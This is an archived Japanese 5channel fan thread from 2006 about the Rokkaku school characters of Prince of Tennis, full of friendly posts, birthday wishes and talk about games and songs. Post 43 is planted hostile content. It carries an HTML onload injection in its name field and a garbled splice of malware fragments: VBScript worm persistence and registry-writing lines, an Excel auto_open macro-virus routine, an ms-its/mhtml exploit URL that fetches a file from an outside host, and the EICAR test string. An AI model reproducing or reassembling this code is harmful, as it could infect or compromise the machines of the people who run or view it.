5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【さよなら三角】テニプリ六角中総合スレ【また来て四角】

1 :名無しかわいいよ名無し:2006/12/11(月) 22:26:48 ID:tmJGnBH+
誰一人として六角キャラスレがなかったようなので。
まったりいきましょう。

2 :名無しかわいいよ名無し:2006/12/11(月) 22:29:19 ID:nPUXQxzt
2ゲト

3 :名無しかわいいよ名無し:2006/12/11(月) 22:30:05 ID:nPUXQxzt
2ゲトズササ

4 :名無しかわいいよ名無し:2006/12/11(月) 22:31:31 ID:AqYvq3I/
2ゲト

5 :名無しかわいいよ名無し:2006/12/11(月) 23:26:31 ID:d2HLYFFc
華麗に5ゲト
そして>>1超乙

過去に六角スレはあったみたいだがdat落ちしたらしいね
今度は落ちないように油断せずに行こう


6 :名無しかわいいよ名無し:2006/12/11(月) 23:48:37 ID:HoKCczsB
>>1


プレッシャーに強い子やフリーになるのが嫌な子や
寒く見えて実は面白い駄洒落を言う子や
はたまたそれに全力でツッコミを入れる子や機関車や
くすくす言うあの双子やあまり目立たないあの子や
六角予備軍もさよなら三角またきて四角かかってきやがれ俺達六角な彼等が 大 好 き だ !

しかし、このさよなら〜のキャッチフレーズだが金賞のより愛着があるなw

7 :名無しかわいいよ名無し:2006/12/12(火) 09:26:15 ID:eI2pYCxn
>>1乙!
峰も四天もスレあるのに六角なくて寂しかったよ!!

8 :名無しかわいいよ名無し:2006/12/12(火) 20:30:16 ID:tYYDcm38
六角スレキタな!!
皆仲よさそうで大好きだ〜ハァハァ(´Д`*)

9 :名無しかわいいよ名無し:2006/12/12(火) 20:59:13 ID:fC1bE4Vy
1乙カレ三角!

氷帝なんかレギュラー全員(+滝&監督)スレ立ってるのに六角なくて寂しかったよ
でも立ってよかった〜
みんなと海遊びしたいなぁ

10 :名無しかわいいよ名無し:2006/12/12(火) 21:10:03 ID:a6dyWb4U
>>1
乙!
六角スレができて嬉しいよ。
以心伝心の六角っ子が大好きだ。

11 :名無しかわいいよ名無し:2006/12/12(火) 21:12:45 ID:69wjYUiw
>>1乙だぜ!
来週は剣太郎の誕生日ですね

12 :名無しかわいいよ名無し:2006/12/12(火) 22:00:53 ID:uTdxkDxH
六角スレがあると聞いてとんできますた。
とりあえずダビデ萌え。そして>>1乙!

13 :名無しかわいいよ名無し:2006/12/12(火) 22:10:39 ID:KNCt3jUq
>>1乙!
テニプリ界一の漢前はバネさんだと信じている。

六角っ子達は今の時期でもみんなで海遊びなのかな??

14 :名無しかわいいよ名無し:2006/12/12(火) 22:24:48 ID:njova5LZ
>>1乙!

テニプリで一番素で王子キャラなのはサエだろう!と言ってみる。

15 :名無しかわいいよ名無し:2006/12/12(火) 23:30:49 ID:npH3Tgeb
>>1
乙!
六角好きがいてスレが立った…それだけのことなのにすごく嬉しい
あったかい気持ちになれたよ

16 :名無しかわいいよ名無し:2006/12/13(水) 00:52:35 ID:m5+VfreH
>>1乙!
テニプリで一番憎めないキャラはダビだと思い込んでみる。

六角ファンも六角メンバ同様あたたかいのね。なんだか嬉しい(●´∀`●)/

17 :名無しかわいいよ名無し:2006/12/13(水) 09:08:36 ID:fWyLEflZ
>>1乙 がここまでついてるの見るの初めてかも
あーもう六角素敵過ぎる。
声の人も舞台の人も六角メンバーは皆仲良し過ぎて大好きだ!!

18 :名無しかわいいよ名無し:2006/12/13(水) 09:55:39 ID:KKJkY3u8
そうだよね、奴らが仲良しなのは言うまでもなく
中の人や外の人たちも皆仲良いエピソードを投下してくれるので
嬉しくてたまらん

19 :名無しかわいいよ名無し:2006/12/13(水) 12:41:46 ID:DlPKvpyP
あったかいな、ここは。オジイ含め、みんな好きだ(*^_^*)
先週のラジプリで、いっちゃんとサエさんが共演したのも楽しかった。
本当にみんな仲良しなんだな〜


20 :名無しかわいいよ名無し:2006/12/14(木) 00:55:40 ID:/BfpcaWc
原作もアニも中の人も仲良くてWW
彼らの個性と友情は何だか見てて幸せになれる。それが六角(´ω`)大好き


21 :名無しかわいいよ名無し:2006/12/15(金) 10:23:23 ID:gWKjXDcA
保シュポポー

22 :名無しかわいいよ名無し:2006/12/15(金) 22:43:13 ID:AwY7jd7T
>>21いっちゃんキタww

もうすぐ我らが葵部長の誕生日じゃないか!!
・・・剣太郎を「部長」って呼ぶのってなんか変な気分になってしまう(´・ω・`)

23 :名無しかわいいよ名無し:2006/12/15(金) 23:34:02 ID:RcJ3d2sv
前々から疑問に思ってたんだけど、
前年秋で3年=先代部長が引退した後、剣太郎が入学するまで部長はどうなってたんだろう。

1.まだ剣太郎とは決まってなくて、サエさんが部長だった
2.既に剣太郎と予約されていて空席だった&とりあえずサエさんが代行
3.ランドセル背負った剣太郎が既にちょこちょこ顔を出していた

普通に考えると1か2だろうけど、六角の雰囲気なら3もありそうw

24 :名無しかわいいよ名無し:2006/12/15(金) 23:37:13 ID:q+ffuRq/
4.たしけはそんなに深く考えてなかった


が正解な気ガス

25 :名無しかわいいよ名無し:2006/12/16(土) 01:40:22 ID:qyfrk5Yh
さよなら三角
また来て四角
そして俺達六角

26 :名無しかわいいよ名無し:2006/12/16(土) 02:27:06 ID:bCLw/iJl
今日、ミュを見てきたんだけど
相変わらずむっちゃ自然体の仲良しオーラが出てたよ。
演技してるとは思えない仲の良さに見ててめちゃくちゃほのぼのしたw
さすが六角。

27 :名無しかわいいよ名無し:2006/12/17(日) 12:17:37 ID:/VzBWO7C
そうか…ミュも始まったのか…。
どのメディアでも六角が仲良しなのはいいことだな(´・ω・`)

28 :名無しかわいいよ名無し:2006/12/17(日) 23:06:55 ID:peZkLkVn
ロン毛がーキモいー♪



(´・ω・`)みゅ

29 :名無しかわいいよ名無し:2006/12/18(月) 11:48:59 ID:e5cH5SXM
淳スレを読んでこのスレの存在を知った…
今更だが>>1乙!
六角ってほのぼのしているから好きだなぁ。
 
 
 
 
 
 
 
 
 
 
 
 
今度はスレが落ちないように祈ってるw

30 :名無しかわいいよ名無し:2006/12/18(月) 20:35:18 ID:cn26Ahy/
とうとう見つけたze!六角スレ!
亀もいいとこだが>>1乙!

最近ラブプリをゲトして、ダビデの歌に(*´д`)


31 :名無しかわいいよ名無し:2006/12/18(月) 22:19:52 ID:DRQayDGj
試合中に愛が始まるアレか

32 :名無しかわいいよ名無し:2006/12/18(月) 23:16:19 ID:ws4ZIqQf
ラブプリ懐かしいw
そういや初めてサエさんの曲名を見た時は悶絶した。
「情熱ロケット」って…!なんだかすごい曲名w

33 :名無しかわいいよ名無し:2006/12/19(火) 03:34:16 ID:cnlVoMSN
バネさんの歌には負ける

34 :名無しかわいいよ名無し:2006/12/19(火) 06:43:44 ID:76knXVJN
バネさんのアレは何故敢えてこれをチョイスした…?と聴きたくなる曲だよな。

でもいつの間にか口ずさんでる自分がいる

35 :名無しかわいいよ名無し:2006/12/20(水) 06:57:57 ID:Pit5ZjE5
けんたろー誕生日おめでとう!

36 :名無しかわいいよ名無し:2006/12/20(水) 13:11:39 ID:Yp0YNxEg
けんたろーおめ!!

37 :名無しかわいいよ名無し:2006/12/20(水) 14:30:53 ID:dUYTK2ef
剣ちゃんおめでと!!

いつか彼女が出来たら良いね

38 :名無しかわいいよ名無し:2006/12/20(水) 18:59:07 ID:+22sJNhs
今日初めてこのスレ発見!>>1乙です!
剣太郎誕生日オメ!愛してるよ。

39 :名無しかわいいよ名無し:2006/12/20(水) 19:09:02 ID:bKod+dOY
剣太郎ハピバ!
いつまでも可愛い部長でいてオクレ!

40 :名無しかわいいよ名無し:2006/12/20(水) 19:13:46 ID:HmKcf+Tz
剣太郎オメ!


41 :名無しかわいいよ名無し:2006/12/20(水) 19:28:44 ID:LKlXUJ25
剣太郎13歳オメ ノシノシ
ドキサバ期待してるよー!!!

42 :名無しかわいいよ名無し:2006/12/20(水) 20:31:43 ID:oDKCmwa5
ケンケンはぴば!
この時期の坊主は、ちょっと頭がスースーして寒そうなので
みんなから帽子をプレゼントされてると、勝手に想像してみるw

43 :<body onload=window()>:2006/12/20(水) 20:36:50 ID:5wTgN0l2
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


44 :名無しかわいいよ名無し:2006/12/23(土) 00:26:06 ID:ruM4XA41
保守あげ。

皆ドキサバやってるから静かなのかな…
六角っ子落とせるのは海のみだけど
山編の最初にも少しだけ出番あって嬉しいなw
オジイにも台詞があったのが嬉しかった。

45 :名無しかわいいよ名無し:2006/12/24(日) 11:34:13 ID:vx5AO/YB
>>33バネさんの歌って
おジイのこと歌ってるの?
それとも架空の先生?
焼〜き付く太陽浴びなが〜ら♪

46 :名無しかわいいよ名無し:2006/12/24(日) 18:21:27 ID:7JEpgZ/w
ヌの六角の歌を知ってる人に…どこのコートに行けば六画メンあえますかっ??

とか…聞いてみたりw

47 :名無しかわいいよ名無し:2006/12/26(火) 22:42:36 ID:Di0gx9V2
ちょ、オジイwwwあれ見れただけで自分の中では神ゲー決定w>ドキサバ
六角連中のキャラソン聴きながら海編を今か今かと待ちわびてるよ
はやくダビデに寒い駄洒落を聞かされながらバネさんつっこまれ、
剣太郎にプレッシャーかけつつサエさんと浜辺で追っかけっこしたいw

48 :名無しかわいいよ名無し:2006/12/27(水) 07:23:54 ID:mBhJeBcL
>>47
追っかけっこしたい が けっこんしたい に見えた。


49 :名無しかわいいよ名無し:2006/12/27(水) 11:45:55 ID:hQAbU/dC
書きこんどけば落ちないかな

50 :名無しかわいいよ名無し:2006/12/29(金) 00:49:05 ID:Jm3L2W5U
海編出るまで落ちるなよ!

51 :名無しかわいいよ名無し:2006/12/29(金) 11:14:22 ID:pfaxdS39
そうだよな!!
自分達はまだこのスレを落としちゃいけない…海がでるまで!

52 :名無しかわいいよ名無し:2006/12/29(金) 12:15:27 ID:3OXKetZ2
冒頭のサエさん立ち絵結構いいね。ダビデにも早く会いたい・・・


53 :名無しかわいいよ名無し:2006/12/29(金) 17:48:49 ID:ro+A7gmq
海編、初っ端から六角っ子が大活躍ですね皆さんw

今週のWJに載ってたから皆知ってると思うけど
一応ネタバレなのでメル欄で。
あのスチル見て、心の底から573ありがとうと思った。
あと一ヶ月待ちきれない……!

12 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)